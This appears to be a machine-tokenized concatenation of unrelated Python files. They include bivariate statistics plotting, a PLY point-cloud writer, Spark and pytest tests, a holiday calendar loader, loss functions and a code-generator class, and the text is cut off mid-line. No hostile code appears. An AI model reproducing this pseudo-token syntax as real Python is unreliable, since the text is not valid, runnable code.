cat_dict<block_start><if_stmt>cat_dict[col]<eq>"categorical"<and>cat_dict[target_name]<eq>"categorical"<block_start>fin_cat_dict[col]="catg_catg"<line_sep>catg_catg.append(col)<block_end><elif_stmt>cat_dict[col]<eq>"continous"<and>cat_dict[target_name]<eq>"continous"<block_start>fin_cat_dict[col]="cont_cont"<line_sep>cont_cont.append(col)<block_end><elif_stmt>cat_dict[col]<eq>"continous"<and>cat_dict[target_name]<eq>"categorical"<block_start>fin_cat_dict[col]="catg_cont"<line_sep>catg_cont.append(col)<block_end><else_stmt><block_start>fin_cat_dict[col]="cont_catg"<line_sep>cont_catg.append(col)<block_end><block_end><return>fin_cat_dict catg_catg cont_cont catg_cont cont_catg<block_end>#Return True if the categorical_name are present in the orignal dataframe columns. <def_stmt>is_present columns_name categorical_name<block_start>ls=[i<for>i categorical_name<if>i<not><in>columns_name]<if_stmt>len(ls)<eq>0<block_start><return><true><block_end><else_stmt><block_start><raise>ValueError(str(ls)+" is not present as a column in the data,Please check the name")<block_end><block_end>#Function returns list of columns with non-numeric data. <def_stmt>clean_str_list df lst<block_start>rem=[]<for_stmt>i lst<block_start>res=any(isinstance(n str)<for>n df[i])<if_stmt>res<eq><true><block_start>rem.append(i)<block_end><block_end><for_stmt>j rem<block_start>lst.remove(j)<block_end><return>lst<block_end>#Returns the Pearson Correlation Coefficient for the continous data columns. <def_stmt>pearson_correlation_cont_cont x y<block_start><return>corrcoef(x y)<block_end># This function is for the bivariate analysis between two continous varibale.Plots scatter plots and shows the coeff for the data. <def_stmt>bivariate_analysis_cont_cont cont_cont_list df target_name sub_len COUNTER PLOT_ROW_SIZE PLOT_COLUMNS_SIZE<block_start>clean_cont_cont_list=clean_str_list(df cont_cont_list)<if_stmt>len(clean_str_list(df [target_name]))<eq>0<and>len(cont_cont_list)<g>0<block_start><raise>ValueError("You seem to have a target variable with string values.")<block_end>clean_df=df.dropna()<for_stmt>col clean_cont_cont_list<block_start>summary=clean_df[col].describe()<line_sep>count=summary[0]<line_sep>mean=summary[1]<line_sep>std=summary[2]<line_sep>plt.subplot(PLOT_ROW_SIZE PLOT_COLUMNS_SIZE COUNTER)<line_sep>plt.title("mean "+str(np.float32(mean))+" std "+str(np.float32(std)) fontsize=10)<line_sep>x=clean_df[col]<line_sep>y=np.float32(clean_df[target_name])<line_sep>corr=pearson_correlation_cont_cont(x y)<line_sep>plt.xlabel(col+"\n count "+str(count)+"\n Corr: "+str(np.float32(corr[0][1])) fontsize=10)<line_sep>plt.ylabel(target_name fontsize=10)<line_sep>plt.scatter(x y)<line_sep>print(col+" vs "+target_name+" plotted....")<line_sep>COUNTER<augadd>1<block_end><return>plt COUNTER<block_end>#Chi test is used to see association between catgorical vs categorical variables. #Lower Pvalue are significant they should be < 0.05 #chi value = X^2 = summation [(observed-expected)^2/expected] # The distribution of the statistic X2 is chi-square with (r-1)(c-1) degrees of freedom, where r represents the number of rows in the two-way table and c represents the number of columns. The distribution is denoted (df), where df is the number of degrees of freedom. #pvalue = p(df>=x^2) <def_stmt>evaluate_chi x y<block_start>chi,p_val=chi2(x y)<line_sep><return>chi p_val<block_end><def_stmt>bivariate_analysis_catg_catg catg_catg_list df target_name sub_len COUNTER PLOT_ROW_SIZE PLOT_COLUMNS_SIZE bin_size="auto"<block_start>clean_catg_catg_list=clean_str_list(df catg_catg_list)<line_sep>clean_df=df.dropna()<line_sep>target_classes=df[target_name].unique()<line_sep>label=[str(i)<for>i target_classes]<line_sep>c=0<for_stmt>col clean_catg_catg_list<block_start>summary=clean_df[col].describe()<line_sep>binwidth=0.7<if_stmt>bin_size<eq>'auto'<block_start>bins_size=np.arange(min(clean_df[col].tolist()) max(clean_df[col].tolist())+binwidth binwidth)<block_end><else_stmt><block_start>bins_size=bin_size<block_end>count=summary[0]<line_sep>mean=summary[1]<line_sep>std=summary[2]<line_sep>plt.subplot(PLOT_ROW_SIZE PLOT_COLUMNS_SIZE COUNTER)<line_sep>plt.title("mean "+str(np.float32(mean))+" std "+str(np.float32(std)) fontsize=10)<line_sep>x=[np.array(clean_df[clean_df[target_name]<eq>i][col])<for>i target_classes]<line_sep>y=clean_df[target_name]<line_sep>chi,p_val=evaluate_chi(np.array(clean_df[col]).reshape(-1 1) y)<line_sep>plt.xlabel(col+"\n chi: "+str(np.float32(chi[0]))+" / p_val: "+str(p_val[0]) fontsize=10)<line_sep>plt.ylabel("Frequency" fontsize=10)<line_sep>plt.hist(x bins=bins_size stacked=<true> label=label)<line_sep>plt.legend(prop={'size':10})<line_sep>print(col+" vs "+target_name+" plotted....")<line_sep>COUNTER<augadd>1<line_sep>c<augadd>1<block_end><return>plt COUNTER<block_end># Analysis of variance (ANOVA) is a collection of statistical models used to analyze the differences among group means and their associated procedures (such as "variation" among and between groups) # In its simplest form, ANOVA provides a statistical test of whether or not the means of several groups are equal, and therefore generalizes the t-test to more than two groups. ANOVAs are useful for comparing (testing) three or more means (groups or variables) for statistical significance. # A one-way ANOVA is used to compare the means of more than two independent groups. A one-way ANOVA comparing just two groups will give you the same results as the independent t test. <def_stmt>evaluate_anova x y<block_start>F_value,pvalue=f_classif(x y)<line_sep><return>F_value pvalue<block_end># In descriptive statistics, a box plot or boxplot is a convenient way of graphically depicting groups of numerical data through their quartiles. Box plots may also have lines extending vertically from the boxes (whiskers) indicating variability outside the upper and lower quartiles, hence the terms box-and-whisker plot and box-and-whisker diagram. # Quartile: In descriptive statistics, the quartiles of a ranked set of data values are the three points that divide the data set into four equal groups, each group comprising a quarter of the data <def_stmt>bivariate_analysis_cont_catg cont_catg_list df target_name sub_len COUNTER PLOT_ROW_SIZE PLOT_COLUMNS_SIZE<block_start>clean_cont_catg_list=clean_str_list(df cont_catg_list)<if_stmt>len(clean_str_list(df [target_name]))<eq>0<and>len(cont_catg_list)<g>0<block_start><raise>ValueError("You seem to have a target variable with string values.")<block_end>clean_df=df.dropna()<for_stmt>col clean_cont_catg_list<block_start>col_classes=clean_df[col].unique()<line_sep>summary=clean_df[col].describe()<line_sep>count=summary[0]<line_sep>mean=summary[1]<line_sep>std=summary[2]<line_sep>plt.subplot(PLOT_ROW_SIZE PLOT_COLUMNS_SIZE COUNTER)<line_sep>plt.title("mean "+str(np.float32(mean))+" std "+str(np.float32(std)) fontsize=10)<line_sep>x=[np.array(clean_df[clean_df[col]<eq>i][target_name])<for>i col_classes]<line_sep>y=np.float32(clean_df[target_name])<line_sep>f_value,p_val=evaluate_anova(np.array(clean_df[col]).reshape(-1 1) y)<line_sep>plt.xlabel(col+"\n f_value: "+str(np.float32(f_value[0]))+" / p_val: "+str(p_val[0]) fontsize=10)<line_sep>plt.ylabel(target_name fontsize=10)<line_sep>plt.boxplot(x)<line_sep>print(col+" vs "+target_name+" plotted....")<line_sep>COUNTER<augadd>1<block_end><return>plt COUNTER<block_end># This function is for the bivariate analysis between categorical vs continuous varibale.Plots box plots. <def_stmt>bivariate_analysis_catg_cont catg_cont_list df target_name sub_len COUNTER PLOT_ROW_SIZE PLOT_COLUMNS_SIZE# No need to remove string varible as they are handled by chi2 function of sklearn. # clean_catg_cont_list = clean_str_list(df,catg_cont_list) <block_start>clean_catg_cont_list=catg_cont_list<line_sep>clean_df=df.dropna()<for_stmt>col clean_catg_cont_list<block_start>col_classes=df[target_name].unique()<line_sep>summary=clean_df[col].describe()<line_sep>count=summary[0]<line_sep>mean=summary[1]<line_sep>std=summary[2]<line_sep>plt.subplot(PLOT_ROW_SIZE PLOT_COLUMNS_SIZE COUNTER)<line_sep>plt.title("mean "+str(np.float32(mean))+" std "+str(np.float32(std)) fontsize=10)<line_sep>x=[np.array(clean_df[clean_df[target_name]<eq>i][col])<for>i col_classes]<line_sep>y=clean_df[target_name]<line_sep>f_value,p_val=evaluate_anova(np.array(clean_df[col]).reshape(-1 1) y)<line_sep>plt.xlabel(target_name+"\n f_value: "+str(np.float32(f_value[0]))+" / p_val: "+str(p_val[0]) fontsize=10)<line_sep>plt.ylabel(col fontsize=10)<line_sep>plt.boxplot(x)<line_sep>print(col+" vs "+target_name+" plotted....")<line_sep>COUNTER<augadd>1<block_end><return>plt COUNTER<block_end>#returns the total number of subplots to be made. <def_stmt>total_subplots df lst<block_start>clean_df=df.dropna()<line_sep>total=[len(clean_str_list(clean_df i))<for>i lst]<line_sep><return>sum(total)<block_end># This function returns new categotical list after removing drop values if in case they are written in both drop and categorical_name list. <def_stmt>remove_drop_from_catglist drop categorical_name<block_start><for_stmt>col drop<block_start><if_stmt>col<in>categorical_name<block_start>categorical_name.remove(col)<block_end><block_end><return>categorical_name<block_end><def_stmt>plot data_input target_name="" categorical_name=[] drop=[] PLOT_COLUMNS_SIZE=4 bin_size="auto" wspace=0.5 hspace=0.8<block_start>""" This is the main function to give Bivariate analysis between the target variable and the input features. Parameters ----------- data_input : Dataframe This is the input Dataframe with all data. target_name : String The name of the target column. categorical_name : list Names of all categorical variable columns with more than 2 classes, to distinguish with the continuous variables. drop : list Names of columns to be dropped. PLOT_COLUMNS_SIZE : int Number of plots to display vertically in the display window.The row size is adjusted accordingly. bin_size : int ;default="auto" Number of bins for the histogram displayed in the categorical vs categorical category. wspace : int ;default = 0.5 Horizontal padding between subplot on the display window. hspace : int ;default = 0.5 Vertical padding between subplot on the display window. ----------- """<if_stmt>type(data_input).__name__<eq>"DataFrame"# Column names <block_start>columns_name=data_input.columns.values<line_sep>#To drop user specified columns. <if_stmt>is_present(columns_name drop)<block_start>data_input=data_input.drop(drop axis=1)<line_sep>columns_name=data_input.columns.values<line_sep>categorical_name=remove_drop_from_catglist(drop categorical_name)<block_end><else_stmt><block_start><raise>ValueError("Couldn't find it in the input Dataframe!")<block_end><if_stmt>target_name<eq>""<block_start><raise>ValueError("Please mention a target variable")<block_end>#Checks if the categorical_name are present in the orignal dataframe columns. categorical_is_present=is_present(columns_name categorical_name)<line_sep>target_is_present=is_present(columns_name [target_name])<if_stmt>categorical_is_present<block_start>fin_cat_dict,catg_catg_list,cont_cont_list,catg_cont_list,cont_catg_list=get_category(data_input target_name categorical_name columns_name)<block_end>#Subplot(Total number of graphs) total=total_subplots(data_input [cont_cont_list catg_catg_list catg_cont_list cont_catg_list])<if_stmt>total<l>PLOT_COLUMNS_SIZE<block_start>total=PLOT_COLUMNS_SIZE<block_end>PLOT_ROW_SIZE=ceil(float(total)/PLOT_COLUMNS_SIZE)<line_sep>#Call various functions plot,count=bivariate_analysis_cont_cont(cont_cont_list data_input target_name total COUNTER PLOT_ROW_SIZE PLOT_COLUMNS_SIZE)<line_sep>plot,count=bivariate_analysis_catg_catg(catg_catg_list data_input target_name total count PLOT_ROW_SIZE PLOT_COLUMNS_SIZE bin_size=bin_size)<line_sep>plot,count=bivariate_analysis_cont_catg(cont_catg_list data_input target_name total count PLOT_ROW_SIZE PLOT_COLUMNS_SIZE)<line_sep>plot,count=bivariate_analysis_catg_cont(catg_cont_list data_input target_name total count PLOT_ROW_SIZE PLOT_COLUMNS_SIZE)<line_sep>fig.subplots_adjust(bottom=0.08 left=0.05 right=0.97 top=0.93 wspace=wspace hspace=hspace)<line_sep>plot.show()<block_end><else_stmt><block_start><raise>ValueError("Make sure input data is a Dataframe.")<block_end><block_end>
<import_stmt>os<import_stmt>numpy<as>np<def_stmt>save_samples_truncted_prob fname points prob<block_start>''' Save the visualization of sampling to a ply file. Red points represent positive predictions. Green points represent negative predictions. Parameters fname: File name to save points: [N, 3] array of points prob: [1, N] array of predictions in the range [0~1] Return: None '''<line_sep>prob=prob.transpose(0 1).detach().numpy()<line_sep>r=(prob<g>0.5).reshape([-1 1])<times>255<line_sep>g=(prob<l>0.5).reshape([-1 1])<times>255<line_sep>b=np.zeros(r.shape)<line_sep>to_save=np.concatenate([points r g b prob] axis=-1)<line_sep><return>np.savetxt(fname to_save fmt='%.6f %.6f %.6f %d %d %d %.6f' comments='' header=('ply\nformat ascii 1.0\nelement vertex {:d}\nproperty float x\nproperty float y\nproperty float z\nproperty uchar red\nproperty uchar green\nproperty uchar blue\nproperty float prob\nend_header').format(points.shape[0]))<block_end><def_stmt>save_gallery preds samples names gallery_id epoch<block_start>pred=preds[0].cpu()<line_sep>sample=samples[0].transpose(0 1).cpu()<line_sep>name=names[0]<line_sep>save_gallery_path=os.path.join(gallery_id name.split('/')[-2] "epoch_{:03d}".format(epoch))<line_sep>os.makedirs(save_gallery_path exist_ok=<true>)<line_sep>path=os.path.join(save_gallery_path 'pred.ply')<line_sep>save_samples_truncted_prob(path sample pred)<block_end>
<import_from_stmt>pyspark.sql.types ArrayType IntegerType StringType StructField StructType <import_from_stmt>butterfree.extract.pre_processing explode_json_column<import_from_stmt>butterfree.testing.dataframe assert_dataframe_equality create_df_from_collection <def_stmt>test_explode_json_column spark_context spark_session# arrange <block_start>input_data=[{"json_column":'{"a": 123, "b": "abc", "c": "123", "d": [1, 2, 3]}'}]<line_sep>target_data=[{"json_column":'{"a": 123, "b": "abc", "c": "123", "d": [1, 2, 3]}' "a":123 "b":"abc" "c":123 "d":[1 2 3] }]<line_sep>input_df=create_df_from_collection(input_data spark_context spark_session)<line_sep>target_df=create_df_from_collection(target_data spark_context spark_session)<line_sep>json_column_schema=StructType([StructField("a" IntegerType()) StructField("b" StringType()) StructField("c" IntegerType()) StructField("d" ArrayType(IntegerType())) ])<line_sep># act output_df=explode_json_column(input_df "json_column" json_column_schema)<line_sep># arrange assert_dataframe_equality(target_df output_df)<block_end>
# Copyright 2016 The Chromium Authors. All rights reserved. # Use of this source code is governed by a BSD-style license that can be # found in the LICENSE file. {'targets':[# { # 'target_name': 'cast_extension_discoverer', # 'includes': ['../../../compile_js2.gypi'], # }, # { # 'target_name': 'cast_video_element', # 'includes': ['../../../compile_js2.gypi'], # }, # { # 'target_name': 'caster', # 'includes': ['../../../compile_js2.gypi'], # }, # { # 'target_name': 'media_manager', # 'includes': ['../../../compile_js2.gypi'], # }, ] }<line_sep>
# Copyright 2012 Viewfinder Inc. All Rights Reserved. """Calendar datamodel. Calendars provide color to a chronology such as the Viewfinder search/ browse tool. Calendars are parsed from the "resources/calendars/" subdirectory on demand and cached. TODO(spencer): this is a very rough beginning meant to capture locale-specific holidays. We use here the holiday calendars provided by Mozilla. The idea in general is to provide an interface to arbitrary calendars, such as the wealth of calendars available via Google's calendar app. """<line_sep>__author__='<EMAIL> (<NAME>)'<import_stmt>datetime<import_stmt>dateutil<import_stmt>logging<import_stmt>os<import_stmt>time<import_stmt>vobject<import_from_stmt>functools partial<import_from_stmt>viewfinder.backend.base util<class_stmt>Calendar(object)<block_start>"""Interface to loading ICS iCalendar calendar data."""<line_sep>_RESOURCES_CALENDARS_FMT='../../resources/calendars/%s'<line_sep>_DEFAULT_CALENDAR_ID='USHolidays.ics'<line_sep>"""Mapping from locale to holidays calendar."""<line_sep>_locale_to_holiday_calendar_map={'ar_DZ':'AlgeriaHolidays.ics' 'es_AR':'ArgentinaHolidays.ics' 'en_AU':'AustraliaHolidays.ics' 'de_AT':'AustrianHolidays.ics' 'eu_ES':'BasqueHolidays.ics' 'nl_BE':'BelgianDutchHolidays.ics' 'fr_BE':'BelgianFrenchHolidays.ics' 'de_BE':'BelgianHolidays.ics' 'es_BO':'BoliviaHolidays.ics' 'pt_BR':'BrazilHolidays.ics' 'bg_BG':'BulgarianHolidays.ics' 'en_CA':'CanadaHolidays.ics' 'es_CL':'ChileHolidays.ics' 'zh_CN':'ChinaHolidays.ics' 'es_CO':'ColombianHolidays.ics' 'hr_HR':'CroatiaHolidays.ics' 'cs_CZ':'CzechHolidays.ics' 'da_DK':'DanishHolidays.ics' 'be_NL':'DutchHolidays.ics' 'nl_NL':'DutchHolidays.ics' 'en_GB':'EnglishHolidays.ics' 'et_EE':'EstoniaHolidays.ics' 'fi_FI':'FinlandHolidays.ics' 'sv_FI':'FinlandHolidays.ics' 'fr_FR':'FrenchHolidays.ics' 'fy_NL':'FrisianHolidays.ics' 'de_DE':'GermanHolidays.ics' 'en_HK':'HongKongHolidays.ics' 'zh_HK':'HongKongHolidays.ics' 'hu_HU':'HungarianHolidays.ics' 'is_IS':'IcelandHolidays.ics' 'id_ID':'IndonesianHolidays.ics' 'it_IT':'ItalianHolidays.ics' 'ja_JP':'JapanHolidays.ics' 'sw_KE':'KenyaHolidays.ics' 'so_KE':'KenyaHolidays.ics' 'om_KE':'KenyaHolidays.ics' 'kam_KE':'KenyaHolidays.ics' 'lv_LV':'LatviaHolidays.ics' 'lt_LT':'LithuanianHolidays.ics' 'de_LU':'LuxembourgHolidays.ics' 'fr_LU':'LuxembourgHolidays.ics' 'en_NZ':'NewZealandHolidays.ics' 'mi_NZ':'NewZealandHolidays.ics' 'nb_NO':'NorwegianHolidays.ics' 'en_PK':'PakistanHolidays.ics' 'pa_Arab_PK':'PakistanHolidays.ics' 'pa_PK':'PakistanHolidays.ics' 'ur_PK':'PakistanHolidays.ics' 'es_PE':'PeruHolidays.ics' 'pl_PL':'PolishHolidays.ics' 'pt_PT':'PortugalHolidays.ics' 'en_QLD':'QueenslandHolidays.ics' 'en_AU_QLD':'QueenslandHolidays.ics' 'ro_MD':'RomaniaHolidays.ics' 'ro_RO':'RomaniaHolidays.ics' 'ru_RU':'RussiaHolidays.ics' 'ru_UA':'RussiaHolidays.ics' 'uk_UA':'RussiaHolidays.ics' 'en_SG':'SingaporeHolidays.ics' 'zh_Hans_SG':'SingaporeHolidays.ics' 'zh_SG':'SingaporeHolidays.ics' 'sk_SK':'SlovakHolidays.ics' 'af_ZA':'SouthAfricaHolidays.ics' 'en_ZA':'SouthAfricaHolidays.ics' 'nr_ZA':'SouthAfricaHolidays.ics' 'nso_ZA':'SouthAfricaHolidays.ics' 'ss_ZA':'SouthAfricaHolidays.ics' 'st_ZA':'SouthAfricaHolidays.ics' 'tn_ZA':'SouthAfricaHolidays.ics' 'ts_ZA':'SouthAfricaHolidays.ics' 've_ZA':'SouthAfricaHolidays.ics' 'xh_ZA':'SouthAfricaHolidays.ics' 'zu_ZA':'SouthAfricaHolidays.ics' 'ko_KR':'SouthKoreaHolidays.ics' 'es_ES':'SpanishHolidays.ics' 'si_LK':'SriLankaHolidays.ics' 'sv_SE':'SwedishHolidays.ics' 'de_CH':'SwissHolidays.ics' 'fr_CH':'SwissHolidays.ics' 'gsw_CH':'SwissHolidays.ics' 'it_CH':'SwissHolidays.ics' 'trv_TW':'TaiwanHolidays.ics' 'zh_Hant_TW':'TaiwanHolidays.ics' 'zh_TW':'TaiwanHolidays.ics' 'th_TH':'ThaiHolidays.ics' 'ku_Latn_TR':'TurkeyHolidays.ics' 'ku_TR':'TurkeyHolidays.ics' 'tr_TR':'TurkeyHolidays.ics' 'cy_GB':'UKHolidays.ics' 'en_GB':'UKHolidays.ics' 'gv_GB':'UKHolidays.ics' 'kw_GB':'UKHolidays.ics' 'en':'USHolidays.ics' 'en_US':'USHolidays.ics' 'es_US':'USHolidays.ics' 'haw_US':'USHolidays.ics' 'es_UY':'UruguayHolidays.ics' 'vi_VN':'VietnamHolidays.ics' }<line_sep>"""Cache for Calendar objects."""<line_sep>_cache=dict()<def_stmt>__init__ self calendar_id<block_start>"""Prepares a calendar for the specified 'calendar_id'. """<line_sep>self.calendar_id=calendar_id<line_sep>cal_path=os.path.dirname(__file__)<line_sep>path=os.path.join(cal_path Calendar._RESOURCES_CALENDARS_FMT%self.calendar_id)<with_stmt>open(path 'rb')<as>f<block_start>self._cal=vobject.readOne(f)<block_end><block_end><def_stmt>GetEvents self year<block_start>"""Returns the events from the calendar for the year specified. In cases where the calendar does not span the requested year, throws a 'NoCalendarDataError' exception. """<line_sep>events=[]<for_stmt>event self._cal.components()<block_start><if_stmt>event.name<eq>'VEVENT'<block_start>name=event.summary.value<if_stmt>event.getrruleset()<block_start>rruleset=event.getrruleset()<line_sep>dates=rruleset.between(datetime.datetime(year-1 12 31) datetime.datetime(year+1 1 1))<if_stmt>len(dates)<ge>1<block_start><if_stmt>len(dates)<g>1<block_start>logging.warning('holiday %s occurs more than once a year: %r'%(name dates))<block_end>delta=event.dtend.value-event.dtstart.value<line_sep>dtstart=dates[0]<line_sep>dtend=dtstart+delta<line_sep>events.append({'name':name 'dtstart':time.mktime(dtstart.timetuple()) 'dtend':time.mktime(dtend.timetuple())})<block_end><block_end><else_stmt><block_start>dtstart=event.dtstart.value<line_sep>dtend=event.dtend.value<if_stmt>dtstart.year<eq>year<block_start>events.append({'name':name 'dtstart':time.mktime(dtstart.timetuple()) 'dtend':time.mktime(dtend.timetuple())})<block_end><block_end><block_end><block_end><return>events<block_end>@classmethod<def_stmt>GetCalendar cls calendar_id=<none><block_start>"""Attempts to locate a cached version of 'calendar_id'. If none is found, attempts to load from disk. """<line_sep>calendar_id=calendar_id<or>Calendar._DEFAULT_CALENDAR_ID<if_stmt><not>Calendar._cache.has_key(calendar_id)<block_start>cal=Calendar(calendar_id)<line_sep>Calendar._cache[calendar_id]=cal<block_end><return>Calendar._cache[calendar_id]<block_end>@classmethod<def_stmt>GetHolidaysByLocale cls locale='en_US'<block_start>"""Attempts to match the specified locale with a holidays calendar. Normalizes the locale by replacing '-' with '_'. """<line_sep>locale=locale.replace('-' '_')<line_sep>calendar_id=Calendar._locale_to_holiday_calendar_map.get(locale <none>)<or>Calendar._DEFAULT_CALENDAR_ID<line_sep><return>Calendar.GetCalendar(calendar_id)<block_end><block_end>
<import_stmt>pytest<import_stmt>aos_version<import_from_stmt>collections namedtuple<line_sep>Package=namedtuple('Package' ['name' 'version'])<line_sep>expected_pkgs={"spam":{"name":"spam" "version":"3.2.1" "check_multi":<false> } "eggs":{"name":"eggs" "version":"3.2.1" "check_multi":<false> } }<line_sep>@pytest.mark.parametrize('pkgs,expected_pkgs_dict' [(# all found [Package('spam' '3.2.1') Package('eggs' '3.2.1')] expected_pkgs ) (# found with more specific version [Package('spam' '3.2.1') Package('eggs' '3.2.1.5')] expected_pkgs ) ([Package('ovs' '2.6') Package('ovs' '2.4')] {"ovs":{"name":"ovs" "version":["2.6" "2.7"] "check_multi":<false> }} ) ([Package('ovs' '2.7')] {"ovs":{"name":"ovs" "version":["2.6" "2.7"] "check_multi":<false> }} ) ])<def_stmt>test_check_precise_version_found pkgs expected_pkgs_dict<block_start>aos_version._check_precise_version_found(pkgs expected_pkgs_dict)<block_end>@pytest.mark.parametrize('pkgs,expect_not_found' [([] {"spam":{"name":"spam" "version":"3.2.1" "check_multi":<false> } "eggs":{"name":"eggs" "version":"3.2.1" "check_multi":<false> }} # none found ) ([Package('spam' '3.2.1')] {"eggs":{"name":"eggs" "version":"3.2.1" "check_multi":<false> }} # completely missing ) ([Package('spam' '3.2.1') Package('eggs' '3.3.2')] {"eggs":{"name":"eggs" "version":"3.2.1" "check_multi":<false> }} # not the right version ) ([Package('eggs' '1.2.3') Package('eggs' '3.2.1.5')] {"spam":{"name":"spam" "version":"3.2.1" "check_multi":<false> }} # eggs found with multiple versions ) ])<def_stmt>test_check_precise_version_found_fail pkgs expect_not_found<block_start><with_stmt>pytest.raises(aos_version.PreciseVersionNotFound)<as>e<block_start>aos_version._check_precise_version_found(pkgs expected_pkgs)<block_end><assert_stmt>list(expect_not_found.values())<eq>e.value.problem_pkgs<block_end>@pytest.mark.parametrize('pkgs,expected_pkgs_dict' [([] expected_pkgs ) (# more precise but not strictly higher [Package('spam' '3.2.1.9')] expected_pkgs ) ([Package('ovs' '2.7')] {"ovs":{"name":"ovs" "version":["2.6" "2.7"] "check_multi":<false> }} ) ])<def_stmt>test_check_higher_version_found pkgs expected_pkgs_dict<block_start>aos_version._check_higher_version_found(pkgs expected_pkgs_dict)<block_end>@pytest.mark.parametrize('pkgs,expected_pkgs_dict,expect_higher' [([Package('spam' '3.3')] expected_pkgs ['spam-3.3'] # lower precision, but higher ) ([Package('spam' '3.2.1') Package('eggs' '3.3.2')] expected_pkgs ['eggs-3.3.2'] # one too high ) ([Package('eggs' '1.2.3') Package('eggs' '3.2.1.5') Package('eggs' '3.4')] expected_pkgs ['eggs-3.4'] # multiple versions, one is higher ) ([Package('eggs' '3.2.1') Package('eggs' '3.4') Package('eggs' '3.3')] expected_pkgs ['eggs-3.4'] # multiple versions, two are higher ) ([Package('ovs' '2.8')] {"ovs":{"name":"ovs" "version":["2.6" "2.7"] "check_multi":<false> }} ['ovs-2.8'] ) ])<def_stmt>test_check_higher_version_found_fail pkgs expected_pkgs_dict expect_higher<block_start><with_stmt>pytest.raises(aos_version.FoundHigherVersion)<as>e<block_start>aos_version._check_higher_version_found(pkgs expected_pkgs_dict)<block_end><assert_stmt>set(expect_higher)<eq>set(e.value.problem_pkgs)<block_end>@pytest.mark.parametrize('pkgs' [[] [Package('spam' '3.2.1')] [Package('spam' '3.2.1') Package('eggs' '3.2.2')] ])<def_stmt>test_check_multi_minor_release pkgs<block_start>aos_version._check_multi_minor_release(pkgs expected_pkgs)<block_end>@pytest.mark.parametrize('pkgs,expect_to_flag_pkgs' [([Package('spam' '3.2.1') Package('spam' '3.3.2')] ['spam'] ) ([Package('eggs' '1.2.3') Package('eggs' '3.2.1.5') Package('eggs' '3.4')] ['eggs'] ) ])<def_stmt>test_check_multi_minor_release_fail pkgs expect_to_flag_pkgs<block_start><with_stmt>pytest.raises(aos_version.FoundMultiRelease)<as>e<block_start>aos_version._check_multi_minor_release(pkgs expected_pkgs)<block_end><assert_stmt>set(expect_to_flag_pkgs)<eq>set(e.value.problem_pkgs)<block_end>
# Copyright 2013 The Chromium Authors. All rights reserved. # Use of this source code is governed by a BSD-style license that can be # found in the LICENSE file. <import_stmt>file_verifier<import_stmt>process_verifier<import_stmt>registry_verifier<class_stmt>VerifierRunner<block_start>"""Runs all Verifiers."""<def_stmt>__init__ self<block_start>"""Constructor."""<line_sep># TODO(sukolsak): Implement other verifiers self._verifiers={'Files':file_verifier.FileVerifier() 'Processes':process_verifier.ProcessVerifier() 'RegistryEntries':registry_verifier.RegistryVerifier() }<block_end><def_stmt>VerifyAll self property variable_expander<block_start>"""Verifies that the current machine states match the property dictionary. A property dictionary is a dictionary where each key is a verifier's name and the associated value is the input to that verifier. For details about the input format for each verifier, take a look at http://goo.gl/1P85WL Args: property: A property dictionary. variable_expander: A VariableExpander object. """<for_stmt>verifier_name,verifier_input property.iteritems()<block_start><if_stmt>verifier_name<not><in>self._verifiers<block_start><raise>KeyError('Unknown verifier %s'%verifier_name)<block_end>self._verifiers[verifier_name].VerifyInput(verifier_input variable_expander)<block_end><block_end><block_end>
<import_from_stmt>fastai.sgdr Callback<class_stmt>CVAELossCallback(Callback)<block_start><pass><block_end>
<import_stmt>torch<import_stmt>torch.nn.functional<as>F<line_sep>__all__=['kl_loss' 'huber_loss']<def_stmt>kl_loss x y<block_start>x=F.softmax(x.detach() dim=1)<line_sep>y=F.log_softmax(y dim=1)<line_sep><return>torch.mean(torch.sum(x<times>(torch.log(x)-y) dim=1))<block_end><def_stmt>huber_loss error delta<block_start>abs_error=torch.abs(error)<line_sep>quadratic=torch.min(abs_error torch.full_like(abs_error fill_value=delta))<line_sep>losses=0.5<times>(quadratic<power>2)+delta<times>(abs_error-quadratic)<line_sep><return>torch.mean(losses)<block_end>
expected_output={"global_drop_stats":{"Ipv4NoAdj":{"octets":296 "packets":7} "Ipv4NoRoute":{"octets":7964 "packets":181} "PuntPerCausePolicerDrops":{"octets":184230 "packets":2003} "UidbNotCfgd":{"octets":29312827 "packets":466391} "UnconfiguredIpv4Fia":{"octets":360 "packets":6} }}<line_sep>
""" Common transformation """<import_stmt>logging<import_stmt>re<import_from_stmt>abc ABC<import_from_stmt>collections namedtuple OrderedDict<import_from_stmt>model.array Array<import_from_stmt>model.enum Enum<import_from_stmt>model.struct Struct<class_stmt>InterfaceProducerCommon(ABC)<block_start>""" Common transformation """<line_sep>version='1.0.0'<def_stmt>__init__ self container_name enums_package structs_package package_name enum_names=() struct_names=() key_words=()<block_start>self.logger=logging.getLogger('Generator.InterfaceProducerCommon')<line_sep>self.container_name=container_name<line_sep>self.enum_names=enum_names<line_sep>self.struct_names=struct_names<line_sep>self.key_words=key_words<line_sep>self.enums_package=enums_package<line_sep>self.structs_package=structs_package<line_sep>self.package_name=package_name<line_sep>self._params=namedtuple('params' 'deprecated description key last mandatory origin return_type since title '<concat>'param_doc name')<block_end>@property<def_stmt>get_version self<block_start><return>self.version<block_end>@property<def_stmt>params self<block_start>""" :return: namedtuple params(name='', origin='') """<line_sep><return>self._params<block_end>@staticmethod<def_stmt>key param:str<block_start>""" Convert param string to uppercase and inserting underscores :param param: camel case string :return: string in uppercase with underscores """<if_stmt>re.match(r'^[A-Z_\d]+$' param)<block_start><return>param<block_end><else_stmt><block_start>result=re.sub(r'([a-z]|[A-Z]{2,})([A-Z]|\d$)' r'\1_\2' param).upper()<line_sep>result=re.sub('IDPARAM' 'ID_PARAM' result)<line_sep><return>result<block_end><block_end>@staticmethod<def_stmt>ending_cutter n:str<block_start>""" If string not contains only uppercase letters and end with 'ID' deleting 'ID' from end of string :param n: string to evaluate and deleting 'ID' from end of string :return: if match cut string else original string """<if_stmt>re.match(r'^\w+[a-z]+([A-Z]{2,})?ID$' n)<block_start><return>n[:-2]<block_end><else_stmt><block_start><return>n<block_end><block_end>@staticmethod<def_stmt>extract_description d<block_start>""" Extract description :param d: list with description :return: evaluated string """<line_sep><return>re.sub(r'(\s{2,}|\n)' ' ' ''.join(d)).strip()<if>d<else>''<block_end>@staticmethod<def_stmt>extract_values param<block_start>p=OrderedDict()<if_stmt>hasattr(param.param_type 'min_size')<block_start>p['array_min_size']=param.param_type.min_size<block_end><if_stmt>hasattr(param.param_type 'max_size')<block_start>p['array_max_size']=param.param_type.max_size<block_end><if_stmt>hasattr(param 'default_value')<block_start><if_stmt>hasattr(param.default_value 